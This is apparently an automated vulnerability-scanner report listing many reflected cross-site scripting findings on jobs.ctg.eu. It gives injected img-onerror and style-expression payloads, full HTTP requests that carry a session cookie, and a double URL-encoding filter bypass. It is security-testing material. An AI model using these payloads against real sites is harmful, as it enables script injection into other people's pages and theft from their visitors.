GET /sites/all1d572"><img%20src%3da%20onerror%3dalert(1)>4fdbbcc7f36/modules/views_accordion/views-accordion.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/we-promise User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680; has_js=1
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3062d"><img%20src%3da%20onerror%3dalert(1)>e573c228bba was submitted in the REST URL parameter 3. This input was echoed as 3062d"><img src=a onerror=alert(1)>e573c228bba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules3062d"><img%20src%3da%20onerror%3dalert(1)>e573c228bba/views_accordion/views-accordion.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/we-promise User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680; has_js=1
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7d15"style%3d"x%3aexpression(alert(1))"0106e014a15 was submitted in the REST URL parameter 3. This input was echoed as b7d15"style="x:expression(alert(1))"0106e014a15 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ea7"><img%20src%3da%20onerror%3dalert(1)>51ac2dadf1d was submitted in the REST URL parameter 4. This input was echoed as 21ea7"><img src=a onerror=alert(1)>51ac2dadf1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7030"><img%20src%3da%20onerror%3dalert(1)>75e7ac5c8f4 was submitted in the REST URL parameter 4. This input was echoed as d7030"><img src=a onerror=alert(1)>75e7ac5c8f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /sites/all/modules/views_accordiond7030"><img%20src%3da%20onerror%3dalert(1)>75e7ac5c8f4/views-accordion.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/we-promise User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680; has_js=1
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18db4"><img%20src%3da%20onerror%3dalert(1)>60208cc18db was submitted in the REST URL parameter 5. This input was echoed as 18db4"><img src=a onerror=alert(1)>60208cc18db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/views_accordion/views-accordion.js18db4"><img%20src%3da%20onerror%3dalert(1)>60208cc18db?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/we-promise User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680; has_js=1
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0e6e"><img%20src%3da%20onerror%3dalert(1)>a95dd8a114 was submitted in the REST URL parameter 1. This input was echoed as b0e6e"><img src=a onerror=alert(1)>a95dd8a114 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sitesb0e6e"><img%20src%3da%20onerror%3dalert(1)>a95dd8a114/all/themes/threesixty/css/content.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1af7"><img%20src%3da%20onerror%3dalert(1)>fc22992ed81 was submitted in the REST URL parameter 2. This input was echoed as c1af7"><img src=a onerror=alert(1)>fc22992ed81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/allc1af7"><img%20src%3da%20onerror%3dalert(1)>fc22992ed81/themes/threesixty/css/content.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f0ed"><img%20src%3da%20onerror%3dalert(1)>710145aa433 was submitted in the REST URL parameter 3. This input was echoed as 1f0ed"><img src=a onerror=alert(1)>710145aa433 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes1f0ed"><img%20src%3da%20onerror%3dalert(1)>710145aa433/threesixty/css/content.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 189af"><img%20src%3da%20onerror%3dalert(1)>73e9826e1ae was submitted in the REST URL parameter 4. This input was echoed as 189af"><img src=a onerror=alert(1)>73e9826e1ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty189af"><img%20src%3da%20onerror%3dalert(1)>73e9826e1ae/css/content.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6646f"><img%20src%3da%20onerror%3dalert(1)>d04b41f719b was submitted in the REST URL parameter 5. This input was echoed as 6646f"><img src=a onerror=alert(1)>d04b41f719b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/css6646f"><img%20src%3da%20onerror%3dalert(1)>d04b41f719b/content.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbdf4"><img%20src%3da%20onerror%3dalert(1)>a2669574242 was submitted in the REST URL parameter 6. This input was echoed as bbdf4"><img src=a onerror=alert(1)>a2669574242 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/css/content.cssbbdf4"><img%20src%3da%20onerror%3dalert(1)>a2669574242?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f83c"><img%20src%3da%20onerror%3dalert(1)>e267de7cab0 was submitted in the REST URL parameter 1. This input was echoed as 9f83c"><img src=a onerror=alert(1)>e267de7cab0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites9f83c"><img%20src%3da%20onerror%3dalert(1)>e267de7cab0/all/themes/threesixty/css/forms.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6659a"><img%20src%3da%20onerror%3dalert(1)>dbe43d36086 was submitted in the REST URL parameter 2. This input was echoed as 6659a"><img src=a onerror=alert(1)>dbe43d36086 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all6659a"><img%20src%3da%20onerror%3dalert(1)>dbe43d36086/themes/threesixty/css/forms.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e923"><img%20src%3da%20onerror%3dalert(1)>8929cc0ff82 was submitted in the REST URL parameter 3. This input was echoed as 4e923"><img src=a onerror=alert(1)>8929cc0ff82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes4e923"><img%20src%3da%20onerror%3dalert(1)>8929cc0ff82/threesixty/css/forms.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66ee0"><img%20src%3da%20onerror%3dalert(1)>a0e58f3bd20 was submitted in the REST URL parameter 4. This input was echoed as 66ee0"><img src=a onerror=alert(1)>a0e58f3bd20 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty66ee0"><img%20src%3da%20onerror%3dalert(1)>a0e58f3bd20/css/forms.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d1d8"><img%20src%3da%20onerror%3dalert(1)>7d59f35fcff was submitted in the REST URL parameter 5. This input was echoed as 3d1d8"><img src=a onerror=alert(1)>7d59f35fcff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/css3d1d8"><img%20src%3da%20onerror%3dalert(1)>7d59f35fcff/forms.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de084"><img%20src%3da%20onerror%3dalert(1)>bada0a754ce was submitted in the REST URL parameter 6. This input was echoed as de084"><img src=a onerror=alert(1)>bada0a754ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/css/forms.cssde084"><img%20src%3da%20onerror%3dalert(1)>bada0a754ce?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 472d7"><img%20src%3da%20onerror%3dalert(1)>d21d98c0b71 was submitted in the REST URL parameter 1. This input was echoed as 472d7"><img src=a onerror=alert(1)>d21d98c0b71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites472d7"><img%20src%3da%20onerror%3dalert(1)>d21d98c0b71/all/themes/threesixty/css/reset.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1609"><img%20src%3da%20onerror%3dalert(1)>bb347cd22fb was submitted in the REST URL parameter 2. This input was echoed as e1609"><img src=a onerror=alert(1)>bb347cd22fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/alle1609"><img%20src%3da%20onerror%3dalert(1)>bb347cd22fb/themes/threesixty/css/reset.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40e93"><img%20src%3da%20onerror%3dalert(1)>6c4bd4ba80 was submitted in the REST URL parameter 3. This input was echoed as 40e93"><img src=a onerror=alert(1)>6c4bd4ba80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes40e93"><img%20src%3da%20onerror%3dalert(1)>6c4bd4ba80/threesixty/css/reset.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d35f"><img%20src%3da%20onerror%3dalert(1)>7f3d9831ebc was submitted in the REST URL parameter 4. This input was echoed as 4d35f"><img src=a onerror=alert(1)>7f3d9831ebc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty4d35f"><img%20src%3da%20onerror%3dalert(1)>7f3d9831ebc/css/reset.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d36f"><img%20src%3da%20onerror%3dalert(1)>c1408102547 was submitted in the REST URL parameter 5. This input was echoed as 4d36f"><img src=a onerror=alert(1)>c1408102547 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/css4d36f"><img%20src%3da%20onerror%3dalert(1)>c1408102547/reset.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8cff"><img%20src%3da%20onerror%3dalert(1)>6a1e3159388 was submitted in the REST URL parameter 6. This input was echoed as d8cff"><img src=a onerror=alert(1)>6a1e3159388 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/css/reset.cssd8cff"><img%20src%3da%20onerror%3dalert(1)>6a1e3159388?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 115eb"><img%20src%3da%20onerror%3dalert(1)>d9768e149d1 was submitted in the REST URL parameter 1. This input was echoed as 115eb"><img src=a onerror=alert(1)>d9768e149d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites115eb"><img%20src%3da%20onerror%3dalert(1)>d9768e149d1/all/themes/threesixty/css/structure.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc85a"><img%20src%3da%20onerror%3dalert(1)>dc393d248fe was submitted in the REST URL parameter 2. This input was echoed as fc85a"><img src=a onerror=alert(1)>dc393d248fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/allfc85a"><img%20src%3da%20onerror%3dalert(1)>dc393d248fe/themes/threesixty/css/structure.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68189"><img%20src%3da%20onerror%3dalert(1)>e75acd7573b was submitted in the REST URL parameter 3. This input was echoed as 68189"><img src=a onerror=alert(1)>e75acd7573b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes68189"><img%20src%3da%20onerror%3dalert(1)>e75acd7573b/threesixty/css/structure.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f73e8"><img%20src%3da%20onerror%3dalert(1)>3a70b67ec54 was submitted in the REST URL parameter 4. This input was echoed as f73e8"><img src=a onerror=alert(1)>3a70b67ec54 in the application's response.
